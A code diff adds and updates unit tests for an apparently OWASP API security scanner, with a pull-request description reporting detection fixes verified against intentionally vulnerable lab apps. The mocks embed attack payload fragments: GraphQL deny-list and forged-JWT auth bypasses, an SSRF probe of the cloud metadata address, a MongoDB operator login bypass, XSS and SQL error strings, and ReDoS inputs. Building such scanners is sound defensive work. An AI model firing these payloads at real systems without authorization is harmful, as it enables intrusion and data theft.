+                  "data": { "__schema": { "queryType": { "fields": [
+                    { "name": "adminUsers", "args": [] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("queryType")))
+                .thenReturn(ok(queryIntrospection));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(q -> q != null && q.contains("{adminUsers{__typename}}"))))
+                .thenReturn(new HttpResponse(200, "{\"errors\":[{\"message\":\"Operation not allowed\"}]}", Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(q -> q != null && q.contains("fragment F"))))
+                .thenReturn(ok("{\"data\":{\"adminUsers\":{\"__typename\":\"AdminUsers\"}}}"));
+
+        List<Finding> findings = testCase.testOperationDenyListBypass(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect the fragment-wrapping bypass");
+        assertEquals("GraphQL Deny-List Bypass via Fragment Wrapping", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag deny-list bypass when the direct call already succeeds")
+    void testDenyListBypassNotDetectedWhenNotBlocked() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String queryIntrospection = """
+                {
+                  "data": { "__schema": { "queryType": { "fields": [
+                    { "name": "adminUsers", "args": [] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("queryType")))
+                .thenReturn(ok(queryIntrospection));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("adminUsers")))
+                .thenReturn(ok("{\"data\":{\"adminUsers\":{\"__typename\":\"AdminUsers\"}}}"));
+
+        List<Finding> findings = testCase.testOperationDenyListBypass(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Nothing to bypass when the field isn't blocked in the first place");
+    }
+
+    @Test
+    @DisplayName("Does not flag deny-list bypass when no sensitive-sounding field exists")
+    void testDenyListBypassSkippedWithoutSensitiveField() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String queryIntrospection = """
+                {
+                  "data": { "__schema": { "queryType": { "fields": [
+                    { "name": "products", "args": [] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(ok(queryIntrospection));
+
+        List<Finding> findings = testCase.testOperationDenyListBypass(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    // ── argument-based auth bypass (#102) ──────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects argument-based auth bypass when a none-alg JWT query argument is accepted")
+    void testArgumentBasedAuthBypassDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), eq("{\"query\":\"{__typename}\"}")))
+                .thenReturn(ok("{\"data\":{\"__typename\":\"Query\"}}"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("me(token:")))
+                .thenReturn(ok("{\"data\":{\"me\":{\"__typename\":\"User\"}}}"));
+
+        List<Finding> findings = testCase.testArgumentBasedAuthBypass(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect the argument-based auth bypass");
+        assertEquals("GraphQL Argument-Based Authentication Bypass", findings.get(0).getTitle());
+        assertEquals(Severity.CRITICAL, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Does not flag argument-based auth bypass when every candidate field rejects the forged token")
+    void testArgumentBasedAuthBypassNotDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), eq("{\"query\":\"{__typename}\"}")))
+                .thenReturn(ok("{\"data\":{\"__typename\":\"Query\"}}"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("token:")))
+                .thenReturn(new HttpResponse(200, "{\"errors\":[{\"message\":\"Unauthorized\"}]}", Map.of()));
+
+        List<Finding> findings = testCase.testArgumentBasedAuthBypass(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
     // ── resolver injection ────────────────────────────────────────────────────
 
     @Test
@@ -285,7 +528,7 @@ class GraphQLSecurityTestCaseTest {
                 }
                 """;
 
-        List<?> results = testCase.extractStringArgMutations(introspection);
+        List<?> results = testCase.extractStringArgFields(introspection, "mutationType");
 
         assertEquals(1, results.size(), "Only createPost has a String-typed argument");
     }
@@ -425,6 +668,96 @@ class GraphQLSecurityTestCaseTest {
         List<Finding> findings = testCase.testResolverInjection(endpoint, httpClient);
 
         assertTrue(findings.isEmpty(), "Should not flag resolver injection when the payload is properly escaped");
+    }
+
+    @Test
+    @DisplayName("Detects injection in a SECOND vulnerable mutation instead of stopping after the first (regression, #100)")
+    void testResolverInjectionFindsMultipleVulnerableMutations() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String introspection = """
+                {
+                  "data": { "__schema": { "mutationType": { "fields": [
+                    { "name": "createComment", "args": [
+                        { "name": "body", "type": { "name": "String", "kind": "SCALAR" } } ] },
+                    { "name": "updateBio", "args": [
+                        { "name": "bio", "type": { "name": "String", "kind": "SCALAR" } } ] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("mutationType")))
+                .thenReturn(ok(introspection));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("queryType")))
+                .thenReturn(new HttpResponse(200, "{\"errors\":[{\"message\":\"no query fields\"}]}", Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("createComment")))
+                .thenReturn(ok("{\"data\":{\"createComment\":\"<script>alert('xss')</script>\"}}"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("updateBio")))
+                .thenReturn(ok("{\"data\":{\"updateBio\":\"<script>alert('xss')</script>\"}}"));
+
+        List<Finding> findings = testCase.testResolverInjection(endpoint, httpClient);
+
+        assertEquals(2, findings.size(), "Both vulnerable mutations should be reported, not just the first");
+    }
+
+    @Test
+    @DisplayName("Detects injection in a QUERY field, not just mutations (regression, #100)")
+    void testResolverInjectionCoversQueryFields() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String noMutations = """
+                { "data": { "__schema": { "mutationType": { "fields": [] } } } }
+                """;
+        String queryIntrospection = """
+                {
+                  "data": { "__schema": { "queryType": { "fields": [
+                    { "name": "pastes", "args": [
+                        { "name": "filter", "type": { "name": "String", "kind": "SCALAR" } } ] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("mutationType")))
+                .thenReturn(ok(noMutations));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("queryType")))
+                .thenReturn(ok(queryIntrospection));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("pastes")))
+                .thenReturn(ok("{\"data\":{\"pastes\":\"sql syntax error near ''\"}}"));
+
+        List<Finding> findings = testCase.testResolverInjection(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect injection in a query field");
+        assertEquals("GraphQL Resolver Injection Vulnerability", findings.get(0).getTitle());
+        assertTrue(findings.get(0).getRequestDetails().contains("query"),
+                "Evidence should reflect this was found via a query field, not a mutation");
+    }
+
+    @Test
+    @DisplayName("Detects GraphQL resolver SSRF when a URL-shaped argument reflects cloud metadata (regression, #100)")
+    void testResolverInjectionDetectsSsrf() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String introspection = """
+                {
+                  "data": { "__schema": { "mutationType": { "fields": [
+                    { "name": "importImage", "args": [
+                        { "name": "url", "type": { "name": "String", "kind": "SCALAR" } } ] }
+                  ] } } }
+                }
+                """;
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("mutationType")))
+                .thenReturn(ok(introspection));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("queryType")))
+                .thenReturn(new HttpResponse(200, "{\"errors\":[{\"message\":\"no query fields\"}]}", Map.of()));
+        // Benign/XSS-style payloads are rejected or unreflected; only the SSRF metadata URL succeeds.
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("importImage")))
+                .thenReturn(ok("{\"data\":{\"importImage\":\"upload failed\"}}"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                contains("169.254.169.254")))
+                .thenReturn(ok("{\"data\":{\"importImage\":\"ami-id: ami-0abcdef1234567890\"}}"));
+
+        List<Finding> findings = testCase.testResolverInjection(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect SSRF via the URL-shaped argument");
+        assertEquals("GraphQL Resolver SSRF Vulnerability", findings.get(0).getTitle());
     }
 
     @Test

--- a/src/test/java/org/owasp/astf/testcases/RegexDosTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/RegexDosTestCaseTest.java
@@ -1,0 +1,104 @@
+package org.owasp.astf.testcases;
+
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mock;
+import org.mockito.MockitoAnnotations;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+import org.owasp.astf.core.result.Finding;
+import org.owasp.astf.core.result.Severity;
+
+import java.io.IOException;
+import java.util.List;
+import java.util.Map;
+
+import static org.junit.jupiter.api.Assertions.*;
+import static org.mockito.ArgumentMatchers.*;
+import static org.mockito.Mockito.when;
+
+@DisplayName("RegexDosTestCase unit tests")
+class RegexDosTestCaseTest {
+
+    @Mock
+    private HttpClient httpClient;
+
+    private RegexDosTestCase testCase;
+
+    @BeforeEach
+    void setUp() {
+        MockitoAnnotations.openMocks(this);
+        testCase = new RegexDosTestCase();
+    }
+
+    @Test
+    @DisplayName("getId / getName / getDescription return expected values")
+    void testMetadata() {
+        assertEquals("ASTF-REDOS-2023", testCase.getId());
+        assertEquals("Regular Expression Denial of Service (ReDoS)", testCase.getName());
+        assertNotNull(testCase.getDescription());
+    }
+
+    @Test
+    @DisplayName("Skips GET endpoints entirely — ReDoS only tested against body-carrying methods")
+    void testSkipsGetEndpoints() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users", "GET");
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Does not flag ReDoS when every response is fast")
+    void testNoFindingWhenFast() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users/1/email", "PUT", "application/json",
+                "{\"email\":\"a@b.com\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.putWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(200, "{\"updated\":true}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects ReDoS when the payload request times out (IOException)")
+    void testDetectsReDosViaTimeout() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users/1/email", "PUT", "application/json",
+                "{\"email\":\"a@b.com\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        // Baseline (benign "test" value) succeeds fast; any call containing the long ReDoS
+        // payload (35 repeated characters) times out instead.
+        when(httpClient.putWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && !body.contains("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
+                        && !body.contains("11111111111111111111111111111111111"))))
+                .thenReturn(new HttpResponse(200, "{\"updated\":true}", Map.of()));
+        when(httpClient.putWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && (body.contains("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
+                        || body.contains("11111111111111111111111111111111111")))))
+                .thenThrow(new IOException("Read timed out"));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect ReDoS from the timeout");
+        assertEquals("Regular Expression Denial of Service (ReDoS)", findings.get(0).getTitle());
+        assertEquals(Severity.HIGH, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Handles exceptions gracefully when the baseline request itself fails")
+    void testHandlesBaselineFailureGracefully() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users/1/email", "PUT", "application/json",
+                "{\"email\":\"a@b.com\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.putWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenThrow(new IOException("Connection refused"));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Should skip gracefully when even the baseline can't be established");
+    }
+}

--- a/src/test/java/org/owasp/astf/testcases/SqlNoSqlInjectionTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/SqlNoSqlInjectionTestCaseTest.java
@@ -1,0 +1,210 @@
+package org.owasp.astf.testcases;
+
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mock;
+import org.mockito.MockitoAnnotations;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+import org.owasp.astf.core.result.Finding;
+import org.owasp.astf.core.result.Severity;
+
+import java.io.IOException;
+import java.util.List;
+import java.util.Map;
+
+import static org.junit.jupiter.api.Assertions.*;
+import static org.mockito.ArgumentMatchers.*;
+import static org.mockito.Mockito.when;
+
+@DisplayName("SqlNoSqlInjectionTestCase unit tests")
+class SqlNoSqlInjectionTestCaseTest {
+
+    @Mock
+    private HttpClient httpClient;
+
+    private SqlNoSqlInjectionTestCase testCase;
+
+    @BeforeEach
+    void setUp() {
+        MockitoAnnotations.openMocks(this);
+        testCase = new SqlNoSqlInjectionTestCase();
+    }
+
+    @Test
+    @DisplayName("getId / getName / getDescription return expected values")
+    void testMetadata() {
+        assertEquals("ASTF-INJECTION-2023", testCase.getId());
+        assertEquals("SQL/NoSQL Injection", testCase.getName());
+        assertNotNull(testCase.getDescription());
+    }
+
+    @Test
+    @DisplayName("Skips GET endpoints with no path parameter — nothing to inject into")
+    void testSkipsGetEndpointsWithoutPathParameter() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/search", "GET");
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects SQL injection via an unresolved path parameter on a GET endpoint (regression, VAmPI live-test gap)")
+    void testDetectsSqlInjectionViaPathParameter() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/{username}", "GET");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(500, "sqlite3::OperationalError near \"'\"", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect SQL injection via the path parameter");
+        assertEquals("SQL Injection Vulnerability", findings.get(0).getTitle());
+        assertTrue(findings.get(0).getRequestDetails().contains("GET"));
+    }
+
+    @Test
+    @DisplayName("Detects SQL injection via an ALREADY-RESOLVED path segment (Scanner resolves templates before test cases run)")
+    void testDetectsSqlInjectionViaResolvedPathSegment() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/name1", "GET");
+        endpoint.setBaseUrl("https://example.com");
+        endpoint.setResolvedFromTemplate(true);
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(500, "sqlite3::OperationalError near \"'\"", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect SQL injection via the resolved path segment");
+        assertEquals("SQL Injection Vulnerability", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag path-parameter SQL injection when the response is clean")
+    void testNoSqlInjectionViaPathParameterWhenClean() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/{username}", "GET");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(404, "{\"error\":\"user not found\"}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects SQL injection when a database error is reflected, independent of path naming")
+    void testDetectsSqlInjectionViaErrorMessage() throws IOException {
+        // Deliberately NOT a webhook/proxy/sync path — the exact gap #96 was filed for.
+        EndpointInfo endpoint = new EndpointInfo("/api/users/search", "POST", "application/json",
+                "{\"query\":\"alice\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(500,
+                        "{\"error\":\"You have an error in your SQL syntax near '''"+"\"}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect SQL injection from the reflected DB error");
+        assertEquals("SQL Injection Vulnerability", findings.get(0).getTitle());
+        assertEquals(Severity.CRITICAL, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Detects SQL injection via a real Python/SQLAlchemy error page (regression: VAmPI live-test gap)")
+    void testDetectsSqlInjectionViaSqlAlchemyError() throws IOException {
+        // The exact error shape VAmPI's real SQLi vulnerability produces — confirmed missing
+        // entirely from SQL_ERROR_INDICATORS until found via live testing.
+        EndpointInfo endpoint = new EndpointInfo("/users/v1/name1", "GET");
+        endpoint.setBaseUrl("https://example.com");
+        endpoint.setResolvedFromTemplate(true);
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(500,
+                        "sqlalchemy.exc.OperationalError: (sqlite3.OperationalError) unrecognized token: \"'''\"",
+                        Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect SQL injection from a real SQLAlchemy/sqlite3 error");
+        assertEquals("SQL Injection Vulnerability", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag SQL injection when no error indicator is present")
+    void testNoSqlInjectionWhenClean() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users/search", "POST", "application/json",
+                "{\"query\":\"alice\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(200, "{\"results\":[]}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects NoSQL authentication bypass when a MongoDB operator replaces the password field")
+    void testDetectsNoSqlAuthBypass() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST", "application/json",
+                "{\"username\":\"alice\",\"password\":\"secret\"}", false);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && body.contains("$ne"))))
+                .thenReturn(new HttpResponse(200, "{\"token\":\"abc123\",\"message\":\"Login successful\"}", Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && !body.contains("$"))))
+                .thenReturn(new HttpResponse(200, "{\"results\":[]}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect NoSQL auth bypass");
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("Authentication Bypass")));
+        assertEquals(Severity.CRITICAL, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Does not flag NoSQL bypass when the operator payload is correctly rejected")
+    void testNoNoSqlBypassWhenRejected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST", "application/json",
+                "{\"username\":\"alice\",\"password\":\"secret\"}", false);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(400, "{\"error\":\"invalid credentials\"}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Uses common field names when the endpoint has no discovered request body")
+    void testFallsBackToCommonFieldNamesWhenNoBody() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/comments", "POST", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(200, "{}", Map.of()));
+
+        assertDoesNotThrow(() -> testCase.execute(endpoint, httpClient));
+    }
+
+    @Test
+    @DisplayName("Handles exceptions gracefully without propagating them")
+    void testHandlesExceptionsGracefully() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/users/search", "POST", "application/json",
+                "{\"query\":\"alice\"}", true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenThrow(new IOException("Connection refused"));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+}

--- a/src/test/java/org/owasp/astf/testcases/TestCaseRegistryTest.java
+++ b/src/test/java/org/owasp/astf/testcases/TestCaseRegistryTest.java
@@ -22,14 +22,14 @@ class TestCaseRegistryTest {
     }
 
     @Test
-    @DisplayName("Should register all 14 default test cases (OWASP API Top 10 + GraphQL + gRPC + mTLS + LLM)")
+    @DisplayName("Should register all 16 default test cases (OWASP API Top 10 + GraphQL + gRPC + mTLS + LLM + Injection + ReDoS)")
     void testDefaultRegistration() {
         List<TestCase> testCases = registry.getAllTestCases();
-        assertEquals(14, testCases.size(), "Should have 14 default test cases");
+        assertEquals(16, testCases.size(), "Should have 16 default test cases");
     }
 
     @Test
-    @DisplayName("Should register all expected OWASP test case IDs plus GraphQL, gRPC, mTLS, and LLM")
+    @DisplayName("Should register all expected OWASP test case IDs plus GraphQL, gRPC, mTLS, LLM, Injection, and ReDoS")
     void testExpectedTestCaseIds() {
         List<TestCase> testCases = registry.getAllTestCases();
         List<String> ids = testCases.stream().map(TestCase::getId).toList();
@@ -48,6 +48,8 @@ class TestCaseRegistryTest {
         assertTrue(ids.contains("ASTF-GRPC-2023"), "Should contain gRPC test case");
         assertTrue(ids.contains("ASTF-MTLS-2023"), "Should contain mTLS test case");
         assertTrue(ids.contains("ASTF-LLM-2023"), "Should contain LLM prompt injection test case");
+        assertTrue(ids.contains("ASTF-INJECTION-2023"), "Should contain SQL/NoSQL injection test case");
+        assertTrue(ids.contains("ASTF-REDOS-2023"), "Should contain ReDoS test case");
     }
 
     @Test
@@ -62,7 +64,7 @@ class TestCaseRegistryTest {
     @DisplayName("Should return all test cases when no enabled/disabled filters set")
     void testGetEnabledNoFilter() {
         List<TestCase> enabled = registry.getEnabledTestCases(config);
-        assertEquals(14, enabled.size());
+        assertEquals(16, enabled.size());
     }
 
     @Test
@@ -80,7 +82,7 @@ class TestCaseRegistryTest {
     void testGetEnabledWithDisabled() {
         config.setDisabledTestCaseIds(List.of("ASTF-API1-2023", "ASTF-API2-2023"));
         List<TestCase> enabled = registry.getEnabledTestCases(config);
-        assertEquals(12, enabled.size());
+        assertEquals(14, enabled.size());
         assertTrue(enabled.stream().noneMatch(tc ->
                 tc.getId().equals("ASTF-API1-2023") || tc.getId().equals("ASTF-API2-2023")));
     }


### PR DESCRIPTION
## Summary

Fixes #95, #96, #97, #98, #99, #100, #101, #102 — 8 coverage gaps found by cross-referencing ASTF's actual scan output against VAmPI's, crAPI's, and DVGA's own documented vulnerability lists (a systematic traceability pass, not speculative additions).

- **#95** — BOLA/BFLA never tested unresolved OpenAPI path-template placeholders (e.g. `{username}`). Fixed by centralizing template resolution in a shared `PathTemplateResolver`, called once per endpoint by `Scanner` before any test case runs — so every test case gets a real, resolved target instead of a dead template string.
- **#96** — No general SQL/NoSQL injection test for ordinary REST body/path/query parameters (new `SqlNoSqlInjectionTestCase`).
- **#97** — No username enumeration or brute-force lockout test (added to `BrokenAuthenticationTestCase`).
- **#98** — No ReDoS test case (new `RegexDosTestCase`).
- **#99** — JWT attack coverage was limited to the "none" algorithm; added kid-path-traversal, RS256-to-HS256 algorithm confusion (via real JWKS fetch), and jku-processing detection.
- **#100** — GraphQL resolver injection stopped after the first confirmed hit across *all* mutations (missing every other vulnerable mutation in the same scan), and only tested mutations, not query fields. Fixed both, plus added GraphQL-specific SSRF payloads.
- **#101** — No GraphQL DoS coverage beyond query depth: added field-duplication, alias-based, and circular-fragment attacks.
- **#102** — Added GraphQL IDE exposure detection (with a cookie-bypass variant), deny-list bypass via fragment wrapping, and argument-based auth bypass.

## A bug found *by* this work, not just fixed by it

Live-testing #95 against VAmPI surfaced a more serious, systemic issue than the original report: a literal, unencoded `{`/`}` in an HTTP request line (which is what every *other* test case sent, since only BOLA had resolution logic) doesn't just fail to test the real endpoint — VAmPI's dev server hangs the connection on it with zero response. Since ~15 of 16 test cases had no resolution logic at all, most of a scan's time on any templated endpoint was being spent hung, not testing anything. Fixed with two complementary changes: `EndpointInfo.getFullUrl()` now percent-encodes the path (so a malformed/unresolved path fails fast instead of hanging, regardless of resolution), and the centralized resolver described above means most templated endpoints get a real value in the first place. A full VAmPI scan that previously took 80+ minutes (mostly hung) now completes in under 4 minutes.

Two more gaps were found the same way during live verification and fixed in the same pass:
- The SQL injection payload list had no bare single-quote payload — VAmPI's real SQLi vulnerability needed a syntax-breaking payload, not the tautology/UNION-style logic payloads that were there.
- The SQL error-indicator list had zero Python/SQLAlchemy patterns (only Ruby/PHP/MSSQL-style strings), silently missing one of the most common web stacks until VAmPI's actual error page was captured.

## Live verification

Re-ran against the same real targets used to find these gaps, on the actual fixed jar (not just unit tests):

- **VAmPI**: BOLA cross-user (#95), SQL injection (#96), and ReDoS (#98) all now fire correctly against VAmPI's real, documented vulnerabilities. Findings went from 21 (round-1 baseline) to 27, with the scan itself over 20x faster.
- **DVGA**: resolver-injection findings went from 1 to 4 (three different vulnerable mutations plus one vulnerable query field — confirming both the breadth fix and the query-field extension in #100). Alias-based and circular-fragment DoS (#101) both fired correctly.
- **crAPI**: JWT algorithm-confusion/kid-traversal/jku checks (#99) correctly found nothing against crAPI's real, properly-validated RS256 JWTs — confirming the new checks don't false-positive against a genuinely secure implementation.

## Test plan

- [x] 339 unit tests passing (up from 293), including new regression tests for every fix mirroring the exact real-world shapes found via live testing
- [x] Live-verified against VAmPI, DVGA, and crAPI on the built jar (not just mocks) — see above
- [x] No endpoint is ever dropped by the path-resolution changes — an unresolvable endpoint is left as-is and still tested exactly as before

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>